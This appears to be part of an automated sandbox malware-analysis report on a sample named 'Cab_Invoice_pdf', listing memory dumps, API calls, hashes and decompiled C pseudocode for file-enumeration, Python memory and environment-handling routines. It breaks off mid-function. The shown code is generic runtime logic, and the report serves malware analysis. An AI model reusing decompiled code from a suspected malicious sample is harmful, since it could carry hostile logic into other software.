                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ab088409fcd14db8c8c04050f73ef86e29dc03131c3fd2e8963f2c6e6efaa0bd
                            • Instruction ID: 4a89b12ab46b1856e3f7aeb0d995e8205a9c6c8902c3ec5bb69bc455b9639a83
                            • Opcode Fuzzy Hash: ab088409fcd14db8c8c04050f73ef86e29dc03131c3fd2e8963f2c6e6efaa0bd
                            • Instruction Fuzzy Hash: A7D06C3200010DBBDF128E84ED06EDA3BAAFB48714F014100BA5856020C736E821AB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 6E2F3030, Relevance: 10.9, APIs: 7, Instructions: 448COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 6E2F2A70: PyMem_Malloc.PYTHON38(?,00000000), ref: 6E2F2AC9
                              • Part of subcall function 6E2F2A70: PyMem_Realloc.PYTHON38(?,?,?), ref: 6E2F2B8C
                            • PyMem_Malloc.PYTHON38(?,?,00000000,?), ref: 6E2F30A3
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Mem_$Malloc$Realloc
                            • String ID:
                            • API String ID: 2718381752-0
                            • Opcode ID: e5fabdcdbb270f12356f9159ff73dcc977f910d2a7bfa80e4af5295b506a8623
                            • Instruction ID: 861721ba17faf920f03d724c9567e34c821b74fc80ce66ac8d119c4941cdbae3
                            • Opcode Fuzzy Hash: e5fabdcdbb270f12356f9159ff73dcc977f910d2a7bfa80e4af5295b506a8623
                            • Instruction Fuzzy Hash: 5AF1ED31A9420ECBDB14CFADC8949ADF7B3FB86315B64412AD8569B305DB31E843CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6E2F2A70, Relevance: 10.9, APIs: 7, Instructions: 448COMMON
                            Download Yara Rule
                            APIs
                            • PyMem_Malloc.PYTHON38(?,00000000), ref: 6E2F2AC9
                            • PyMem_Realloc.PYTHON38(?,?,?), ref: 6E2F2B8C
                            • PyUnicode_FromKindAndData.PYTHON38(00000004,?,00000000,?), ref: 6E2F2D50
                            • PyMem_Free.PYTHON38(?), ref: 6E2F2D5E
                            • PyMem_Free.PYTHON38(?), ref: 6E2F2D90
                            • PyErr_NoMemory.PYTHON38 ref: 6E2F2D99
                            • PyErr_NoMemory.PYTHON38(00000000), ref: 6E2F2FCE
                            Memory Dump Source
                            • Source File: 00000003.00000002.565819604.000000006E2F1000.00000020.00020000.sdmp, Offset: 6E2F0000, based on PE: true
                            • Associated: 00000003.00000002.565811784.000000006E2F0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565828661.000000006E2F6000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565871980.000000006E34B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565943787.000000006E397000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565959535.000000006E39B000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.565975071.000000006E3A0000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566048535.000000006E3F7000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566065624.000000006E3F8000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.566086023.000000006E3F9000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_6e2f0000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Mem_$Err_FreeMemory$DataFromKindMallocReallocUnicode_
                            • String ID:
                            • API String ID: 530066142-0
                            • Opcode ID: db6d7127cbf6248ec84b8285af16bd9a792257663f57e350e5be16424ec95eec
                            • Instruction ID: 4155524695651a6d804b26d30cfd82b0edaffca22831df2ae7ee49d45716b207
                            • Opcode Fuzzy Hash: db6d7127cbf6248ec84b8285af16bd9a792257663f57e350e5be16424ec95eec
                            • Instruction Fuzzy Hash: FA02C2B2E902AECFDB14CF9CC9A0AACF7F6FB47301B154269D8569B251D7319942CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131E260, Relevance: 6.2, APIs: 4, Instructions: 196fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E0131E260(void* __ebx, signed int __edx, void* __edi, void* __esi, WCHAR* _a4, signed int* _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				char _v556;
				char _v580;
				char _v588;
				char _v596;
				struct _WIN32_FIND_DATAW _v604;
				signed int* _v632;
				void* _v636;
				signed int _v648;
				FILETIME* _v1260;
				signed int _v1272;
				signed int _t54;
				WCHAR* _t56;
				signed int _t59;
				signed int _t65;
				signed int _t66;
				signed int _t67;
				void* _t71;
				signed int _t73;
				void* _t75;
				signed int _t77;
				signed int _t78;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t92;
				FILETIME* _t94;
				signed int _t95;
				long _t104;
				long _t105;
				signed int _t106;
				signed int _t119;
				signed int _t122;
				signed int* _t125;
				signed int* _t127;
				void* _t129;
				void* _t130;
				signed int _t131;
				signed int _t132;
				void* _t134;
				signed int _t135;
				void* _t136;
				signed int _t137;

				_t119 = __edx;
				_t54 =  *0x133c008; // 0xa212446c
				_v8 = _t54 ^ _t131;
				_t56 = _a4;
				_push(__esi);
				_t125 = _a8;
				if(_t125 != 0) {
					if(_t56 == 0) {
						goto L1;
					} else {
						_push(__ebx);
						_t122 = FindFirstFileExW(_t56, 0,  &(_v604.ftCreationTime), 0, 0, 0);
						if(_t122 != 0xffffffff) {
							asm("sbb eax, eax");
							 *_t125 =  ~(_v604.ftCreationTime + 0xffffff80) & _v604.ftCreationTime;
							_t65 =  &_v596;
							_push(_t65);
							L33();
							_t125[2] = _t65;
							_t66 =  &_v588;
							_push(_t66);
							_t125[3] = _t119;
							L33();
							_t125[4] = _t66;
							_t67 =  &_v580;
							_push(_t67);
							_t125[5] = _t119;
							L33();
							_t125[6] = _t67;
							_t125[8] = _v604.dwReserved0;
							_t125[7] = _t119;
							_t71 = E0132618C( &(_t125[9]), 0x104,  &_v556);
							_t135 = _t134 + 0x18;
							if(_t71 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E01321798();
								asm("int3");
								_push(_t131);
								_t132 = _t135;
								_t136 = _t135 - 0x254;
								_t73 =  *0x133c008; // 0xa212446c
								_v648 = _t73 ^ _t132;
								_t75 = _v636;
								_push(_t125);
								_t127 = _v632;
								if(_t75 != 0) {
									if(_t75 == 0xffffffff || _t127 == 0) {
										goto L18;
									} else {
										if(FindNextFileW(_t75,  &_v604) != 0) {
											asm("sbb eax, eax");
											 *_t127 =  ~(_v604.dwFileAttributes + 0xffffff80) & _v604.dwFileAttributes;
											_t84 =  &(_v604.ftCreationTime);
											_push(_t84);
											L33();
											_t127[2] = _t84;
											_t85 =  &(_v604.ftLastAccessTime);
											_push(_t85);
											_t127[3] = _t119;
											L33();
											_t127[4] = _t85;
											_t86 =  &(_v604.ftLastWriteTime);
											_push(_t86);
											_t127[5] = _t119;
											L33();
											_t127[6] = _t86;
											_t127[8] = _v604.nFileSizeLow;
											_t127[7] = _t119;
											_t78 = E0132618C( &(_t127[9]), 0x104,  &(_v604.cFileName));
											_t137 = _t136 + 0x18;
											if(_t78 == 0) {
												goto L20;
											} else {
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E01321798();
												asm("int3");
												_push(_t132);
												_t92 =  *0x133c008; // 0xa212446c
												_v1272 = _t92 ^ _t137;
												_t94 = _v1260;
												if(_t94->dwLowDateTime != 0 || _t94->dwHighDateTime != 0) {
													_t94 = FileTimeToSystemTime(_t94,  &_v48);
													if(_t94 == 0) {
														goto L35;
													} else {
														_t94 = SystemTimeToTzSpecificLocalTime(0,  &_v48,  &_v32);
														if(_t94 == 0) {
															goto L35;
														} else {
															_push(0xffffffff);
															_push(_v32.wSecond & 0x0000ffff);
															_t95 = E013256B5(0, _t119, _t127, _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff);
														}
													}
												} else {
													L35:
													_t95 = _t94 | 0xffffffff;
												}
												E0131786A();
												return _t95;
											}
										} else {
											_t104 = GetLastError();
											_t129 = 2;
											if(_t104 < _t129) {
												L28:
												_t77 = E0131C9CE();
												 *_t77 = 0x16;
												goto L19;
											} else {
												if(_t104 <= 3) {
													L30:
													_t77 = E0131C9CE();
													 *_t77 = _t129;
													goto L19;
												} else {
													if(_t104 == 8) {
														_t77 = E0131C9CE();
														 *_t77 = 0xc;
														goto L19;
													} else {
														if(_t104 == 0x12) {
															goto L30;
														} else {
															goto L28;
														}
													}
												}
											}
										}
									}
								} else {
									L18:
									 *((intOrPtr*)(E0131C9CE())) = 0x16;
									_t77 = E01321788();
									L19:
									_t78 = _t77 | 0xffffffff;
									L20:
									E0131786A();
									return _t78;
								}
							} else {
								_t59 = _t122;
								goto L10;
							}
						} else {
							_t105 = GetLastError();
							_t130 = 2;
							if(_t105 < _t130) {
								L8:
								_t106 = E0131C9CE();
								 *_t106 = 0x16;
							} else {
								if(_t105 <= 3) {
									L13:
									_t106 = E0131C9CE();
									 *_t106 = _t130;
								} else {
									if(_t105 == 8) {
										_t106 = E0131C9CE();
										 *_t106 = 0xc;
									} else {
										if(_t105 == 0x12) {
											goto L13;
										} else {
											goto L8;
										}
									}
								}
							}
							_t59 = _t106 | 0xffffffff;
							L10:
							goto L11;
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					_t59 = E01321788() | 0xffffffff;
					L11:
					E0131786A();
					return _t59;
				}
			}


















































                            0x0131e260
                            0x0131e26b
                            0x0131e272
                            0x0131e275
                            0x0131e278
                            0x0131e279
                            0x0131e27e
                            0x0131e297
                            0x00000000
                            0x0131e299
                            0x0131e299
                            0x0131e2af
                            0x0131e2b4
                            0x0131e312
                            0x0131e31a
                            0x0131e31c
                            0x0131e322
                            0x0131e323
                            0x0131e328
                            0x0131e32b
                            0x0131e331
                            0x0131e332
                            0x0131e335
                            0x0131e33a
                            0x0131e33d
                            0x0131e343
                            0x0131e344
                            0x0131e347
                            0x0131e34c
                            0x0131e355
                            0x0131e362
                            0x0131e36b
                            0x0131e370
                            0x0131e375
                            0x0131e37e
                            0x0131e37f
                            0x0131e380
                            0x0131e381
                            0x0131e382
                            0x0131e383
                            0x0131e388
                            0x0131e38b
                            0x0131e38c
                            0x0131e38e
                            0x0131e394
                            0x0131e39b
                            0x0131e39e
                            0x0131e3a1
                            0x0131e3a2
                            0x0131e3a7
                            0x0131e3ce
                            0x00000000
                            0x0131e3d4
                            0x0131e3e4
                            0x0131e430
                            0x0131e438
                            0x0131e43a
                            0x0131e440
                            0x0131e441
                            0x0131e446
                            0x0131e449
                            0x0131e44f
                            0x0131e450
                            0x0131e453
                            0x0131e458
                            0x0131e45b
                            0x0131e461
                            0x0131e462
                            0x0131e465
                            0x0131e46a
                            0x0131e473
                            0x0131e480
                            0x0131e489
                            0x0131e48e
                            0x0131e493
                            0x00000000
                            0x0131e499
                            0x0131e49b
                            0x0131e49c
                            0x0131e49d
                            0x0131e49e
                            0x0131e49f
                            0x0131e4a0
                            0x0131e4a5
                            0x0131e4a8
                            0x0131e4ae
                            0x0131e4b5
                            0x0131e4b8
                            0x0131e4be
                            0x0131e4d2
                            0x0131e4da
                            0x00000000
                            0x0131e4dc
                            0x0131e4e6
                            0x0131e4ee
                            0x00000000
                            0x0131e4f0
                            0x0131e4f4
                            0x0131e4f6
                            0x0131e510
                            0x0131e515
                            0x0131e4ee
                            0x0131e4c6
                            0x0131e4c6
                            0x0131e4c6
                            0x0131e4c9
                            0x0131e51d
                            0x0131e525
                            0x0131e525
                            0x0131e3e6
                            0x0131e3e6
                            0x0131e3ee
                            0x0131e3f1
                            0x0131e402
                            0x0131e402
                            0x0131e407
                            0x00000000
                            0x0131e3f3
                            0x0131e3f6
                            0x0131e41c
                            0x0131e41c
                            0x0131e421
                            0x00000000
                            0x0131e3f8
                            0x0131e3fb
                            0x0131e40f
                            0x0131e414
                            0x00000000
                            0x0131e3fd
                            0x0131e400
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131e400
                            0x0131e3fb
                            0x0131e3f6
                            0x0131e3f1
                            0x0131e3e4
                            0x0131e3a9
                            0x0131e3a9
                            0x0131e3ae
                            0x0131e3b4
                            0x0131e3b9
                            0x0131e3b9
                            0x0131e3bc
                            0x0131e3c2
                            0x0131e3ca
                            0x0131e3ca
                            0x0131e377
                            0x0131e377
                            0x00000000
                            0x0131e377
                            0x0131e2b6
                            0x0131e2b6
                            0x0131e2be
                            0x0131e2c1
                            0x0131e2d2
                            0x0131e2d2
                            0x0131e2d7
                            0x0131e2c3
                            0x0131e2c6
                            0x0131e2fe
                            0x0131e2fe
                            0x0131e303
                            0x0131e2c8
                            0x0131e2cb
                            0x0131e2f1
                            0x0131e2f6
                            0x0131e2cd
                            0x0131e2d0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131e2d0
                            0x0131e2cb
                            0x0131e2c6
                            0x0131e2dd
                            0x0131e2e0
                            0x00000000
                            0x0131e2e1
                            0x0131e2b4
                            0x0131e280
                            0x0131e280
                            0x0131e285
                            0x0131e290
                            0x0131e2e2
                            0x0131e2e8
                            0x0131e2f0
                            0x0131e2f0

                            APIs
                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0131E2A9
                            • GetLastError.KERNEL32 ref: 0131E2B6
                              • Part of subcall function 0131E4A6: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,0131E328,?), ref: 0131E4D2
                              • Part of subcall function 0131E4A6: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,0131E328,?,?,?,?,0131E328,?), ref: 0131E4E6
                            • FindNextFileW.KERNEL32(?,?,?), ref: 0131E3DC
                            • GetLastError.KERNEL32 ref: 0131E3E6
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp Download File
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                            • String ID:
                            • API String ID: 3693236040-0
                            • Opcode ID: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction ID: f873d4738913eaf9a1c2ae63fefe330f0c6efaf0fd50cc1f0d29a19ebbd97c76
                            • Opcode Fuzzy Hash: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction Fuzzy Hash: 6861F7719006199FD73AAF7CCC84AAAB7E8EF45328F000A79E916D7284DB35D9448B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013261F0, Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 419COMMON
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E013261F0(void* __edx, signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t293;
				signed int _t299;
				signed int _t300;
				CHAR* _t301;
				signed int _t303;
				signed int _t304;
				WCHAR* _t305;
				signed int _t306;
				signed int _t307;
				signed int* _t308;
				signed int _t309;
				signed int _t311;
				void* _t317;
				void* _t318;
				void* _t319;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;

				_t283 = __edx;
				_t217 = _a4;
				if(_t217 != 0) {
					_t287 = _t217;
					_t116 = E01318680(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t286;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E0131C9CE())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t299 =  *0x13460bc; // 0xe55920
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t299 -  *0x13460c8; // 0xe572c0
							if(__eflags == 0) {
								L87();
								_t299 = _t120;
								_t120 = _v5;
								_t231 = _t299;
								 *0x13460bc = _t299;
							}
							_t218 = 0;
							__eflags = _t299;
							if(_t299 != 0) {
								L21:
								_t233 = _t287;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t300 = E0132850F(_t299);
												E013209EB(_t218);
												_t321 = _t321 + 0x10;
												__eflags = _t300;
												if(_t300 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t287 = _t218;
													_t126 = _a4;
													 *(_t300 + _t237 * 4) = _t126;
													 *(_t300 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t299 - _t218;
									if( *_t299 == _t218) {
										goto L29;
									} else {
										E013209EB( *((intOrPtr*)(_t299 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t299 + _t282 * 4) - _t218;
												if( *(_t299 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t299 + _t282 * 4) =  *(_t299 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t300 = E0132850F(_t299);
											E013209EB(_t218);
											_t321 = _t321 + 0x10;
											_t126 = _t287;
											__eflags = _t300;
											if(_t300 != 0) {
												L34:
												 *0x13460bc = _t300;
											}
										} else {
											_t126 = _a4;
											_t287 = _t218;
											 *(_t299 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t284 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t284 + 2;
											_t301 = E01320B10(_t238 - _t284, _t238 - _t284 + 2, 1);
											_pop(_t241);
											__eflags = _t301;
											if(_t301 == 0) {
												L42:
												E013209EB(_t301);
												goto L12;
											} else {
												_t131 = E01320A73(_t301, _v12, _a4);
												_t322 = _t321 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E01321798();
													asm("int3");
													_t317 = _t322;
													_t323 = _t322 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t301);
														_push(_t287);
														_push(0x3d);
														_t289 = _t220;
														_t133 = E013188E7(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E0131C9CE())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t303 =  *0x13460c0; // 0xe44410
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t303 -  *0x13460c4; // 0xe44410
																if(__eflags == 0) {
																	_push(_t303);
																	L104();
																	_t246 = _v9;
																	_t303 = _t133;
																	 *0x13460c0 = _t303;
																}
																__eflags = _t303;
																if(_t303 != 0) {
																	L64:
																	_v20 = _v20 - _t289 >> 1;
																	_t138 = E0132682B(_t289, _v20 - _t289 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t304 = E0132850F(_t303);
																					E013209EB(_t221);
																					_t323 = _t323 + 0x10;
																					__eflags = _t304;
																					if(_t304 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t289 = _t221;
																						_t142 = _v0;
																						 *(_t304 + _t253 * 4) = _t142;
																						 *(_t304 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t303 - _t221;
																		if( *_t303 == _t221) {
																			goto L72;
																		} else {
																			E013209EB( *((intOrPtr*)(_t303 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t303 + _t276 * 4) - _t221;
																					if( *(_t303 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t303 + _t276 * 4) =  *(_t303 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t304 = E0132850F(_t303);
																				E013209EB(_t221);
																				_t323 = _t323 + 0x10;
																				_t142 = _t289;
																				__eflags = _t304;
																				if(_t304 != 0) {
																					L77:
																					 *0x13460c0 = _t304;
																				}
																			} else {
																				_t142 = _v0;
																				_t289 = _t221;
																				 *(_t303 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t285 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t285 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t305 = E01320B10(_t254 - _t285 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t305;
																				if(_t305 == 0) {
																					L85:
																					E013209EB(_t305);
																					goto L56;
																				} else {
																					_t148 = E0132618C(_t305, _v16, _v0);
																					_t324 = _t323 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E01321798();
																						asm("int3");
																						_push(_t317);
																						_t318 = _t324;
																						_push(_t289);
																						_t291 = _v92;
																						__eflags = _t291;
																						if(_t291 != 0) {
																							_t260 = 0;
																							_t150 = _t291;
																							__eflags =  *_t291;
																							if( *_t291 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t306 = E01320B10(_t260, _t93, 4);
																							_t262 = _t305;
																							__eflags = _t306;
																							if(_t306 == 0) {
																								L102:
																								E01320ACD(_t221, _t285, _t291, _t306);
																								goto L103;
																							} else {
																								__eflags =  *_t291;
																								if( *_t291 == 0) {
																									L100:
																									E013209EB(0);
																									_t175 = _t306;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t306 - _t291;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t291;
																										_t94 = _t271 + 1; // 0x5
																										_t285 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t285;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t291) = E01320B10(_t262, _t95, 1);
																										E013209EB(0);
																										_t324 = _t324 + 0xc;
																										__eflags =  *(_t221 + _t291);
																										if( *(_t221 + _t291) == 0) {
																											goto L102;
																										} else {
																											_t180 = E01320A73( *(_t221 + _t291), _v16,  *_t291);
																											_t324 = _t324 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E01321798();
																												asm("int3");
																												_push(_t318);
																												_t319 = _t324;
																												_push(_t262);
																												_push(_t262);
																												_push(_t291);
																												_t292 = _v128;
																												__eflags = _t292;
																												if(_t292 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t292;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t306);
																													__eflags =  *_t292;
																													if( *_t292 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t307 = E01320B10(_t263, _t104, 4);
																													__eflags = _t307;
																													if(_t307 == 0) {
																														L119:
																														E01320ACD(_t223, _t285, _t292, _t307);
																														goto L120;
																													} else {
																														__eflags =  *_t292 - _t223;
																														if( *_t292 == _t223) {
																															L117:
																															E013209EB(_t223);
																															_t167 = _t307;
																															goto L118;
																														} else {
																															_t223 = _t307 - _t292;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t292;
																																_t105 = _t267 + 2; // 0x6
																																_t285 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t285 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t292) = E01320B10(_t267 - _t285 >> 1, _t107, 2);
																																E013209EB(0);
																																_t324 = _t324 + 0xc;
																																__eflags =  *(_t223 + _t292);
																																if( *(_t223 + _t292) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E0132618C( *(_t223 + _t292), _v24,  *_t292);
																																	_t324 = _t324 + 0xc;
																																	__eflags = _t173;
